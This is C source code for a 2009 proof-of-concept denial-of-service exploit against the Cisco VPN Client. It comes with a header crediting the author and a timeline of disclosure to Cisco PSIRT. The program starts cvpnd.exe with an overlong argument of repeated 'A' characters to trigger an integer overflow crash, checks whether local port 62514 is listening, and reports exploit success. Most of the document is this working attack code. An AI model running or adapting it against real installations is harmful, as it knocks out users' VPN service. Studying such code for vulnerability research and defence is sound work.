/* * Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code * * By Alex Hernandez aka alt3kx (c) November 2009 * * This POC is only for test. If an application read a malformed chars * file like this POC, the application will be crashed. * * We tested this code on: * * Windows Vista Bussines SP1 Spanish * Windows Vista Home Premium SP1 English * Windows 2000 Server English * Windows XP Professional SP3 * * Cisco VPN client version 5.0.03.0560 * Cisco VPN client Version 5.0.04.0300 * Cisco VPN client Version 5.0.05.0290 * Cisco VPN client Version 4.8.02.0010 * * Compiled on VC++ win32 * * Friends: * sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x * * TT & DSRT * daSh, p4r4n01ds, darkslaker, beto, motis. * * Very special credits to: * * str0ke (milw0rm.com) * rathaus (securiteam.com) * FX (Phenoelit.de) * dSR! (segfault.es) * 0dd (0dd.com) * * * PH-Neutral 0x7d9, We hope to see u there intruders * * --------------- * Report Timeline * --------------- * 06/03/2009 The vulnerability was discovered. * 07/03/2009 Exploit/PoC code was developed (private). * 09/03/2009 Cisco PSIRT was notified about the issue. * 11/03/2009 Vendor response asking for details of the testing environment. * 12/03/2009 Test scenario explained and sent a PDF document with details. * 16/03/2009 Developers/PSIRT confirmed the vulnerability. * 19/03/2009 New test scenarios around new versions (CISCO VPN client). * 23/03/2009 CISCO PSIRT assing an internal tracking PSIRT-0676131279. * 23/03/2009 CISCO PSIRT assing an Bug ID-CSCsz49276. * 15/04/2009 New Advisory release (private). * 16/04/2009 New PSIRT feedback no ETA avaiable. * 23/04/2009 The development team working the fix. * 01/05/2009 The development team estimated one month to fix. * 01/06/2009 New PSIRT feedback, no ETA available. * 29/06/2009 The development team estimated one month to fix. * 28/07/2009 The development team working on maitenance release. * 28/07/2009 The development team estimated one month to fix. * 02/09/2009 New vulnerabilities found on CISCO VPN client. * 02/09/2009 The development team can not publish the new version 5.0.6. * 02/09/2009 The development team working on maitenance release. * 02/09/2009 The development team estimated one month to fix. * 10/09/2009 The BETA program should be finished by the end of Oct * and the client posted next month. * 07/10/2009 The development team estimated one month to fix. * 11/11/2009 New PSIRT feedback RNA avaiable. * 19/11/2009 The vulnerability goes public and PSIRT is informed. * 19/11/2009 Fix and details will available on CISCO Intellishield Alert & Bug Tool kit. * * CISCO Fix and Details: * * BugToolKit: * http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsz49276 * * Intellishield Alert: * http://tools.cisco.com/security/center/viewAlert.x?alertId=19445 * */ #include #include #include #pragma comment ( lib, "ws2_32.lib" ) int CheckPortUDP( short int nPort ) { struct sockaddr_in nSockServer; WSADATA wsaData; int lBusy = 0; int nSocket; /* Initialization */ if( WSAStartup( 0x0101, &wsaData ) == 0 ) { /* Create Socket */ nSockServer.sin_family = AF_INET; nSockServer.sin_port = htons( nPort ); nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); /* Check UDP Protocol */ nSocket = socket( AF_INET, SOCK_DGRAM, 0 ); lBusy = ( bind( nSocket, (SOCKADDR FAR *) &nSockServer, sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR ); /* Close Socket if Busy */ if( lBusy ) closesocket( nSocket ); /* Close Winsock */ WSACleanup(); } /* Return */ return( lBusy ); } int CheckPortTCP( short int nPort ) { struct sockaddr_in nSockServer; WSADATA wsaData; int lBusy = 0; int nSocket; /* Initialization */ if( WSAStartup( 0x0101, &wsaData ) == 0 ) { /* Create Socket */ nSockServer.sin_family = AF_INET; nSockServer.sin_port = htons( nPort ); nSockServer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); /* Check TCP Protocol */ nSocket = socket( AF_INET, SOCK_STREAM, 0 ); lBusy = ( connect( nSocket, (struct sockaddr *) &nSockServer, sizeof( nSockServer ) ) == 0 ); /* Close Socket if Busy */ if( lBusy ) closesocket( nSocket ); /* Close Winsock */ WSACleanup(); } /* Return */ return( lBusy ); } int main(void) { char szPath[] = "C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe"; //uncomment this line for Windows XP Spanish versions //char szPath[] = "C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe"; char buffer[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; PROCESS_INFORMATION pif; STARTUPINFO si; ZeroMemory(&si,sizeof(si)); si.cb = sizeof(si); BOOL bRet = CreateProcess( szPath, buffer, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pif); system("cls"); printf("\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n"); printf(" .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n"); /* Check for TCP Port */ if( CheckPortTCP(62514) ) printf("[+] Cisco VPN Client TCP port listening\t[OK!]\n"); else printf("[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n"); /* Check for UDP Port */ if( CheckPortUDP(62514) ) printf("[+] Cisco VPN Client UDP port listening\t[OK!]\n"); else printf("[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n"); if(bRet == FALSE){MessageBox(HWND_DESKTOP,"Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n","",MB_OK); return 1;} else if (bRet == TRUE){MessageBox(HWND_DESKTOP,"Attempting exploit Cisco VPN DoS exploit...","",MB_OK); printf("\n[+] Few seconds to crash the program...\n"); printf("[+] Exploit success...\n\n"); return 1;} CloseHandle(pif.hProcess); CloseHandle(pif.hThread); }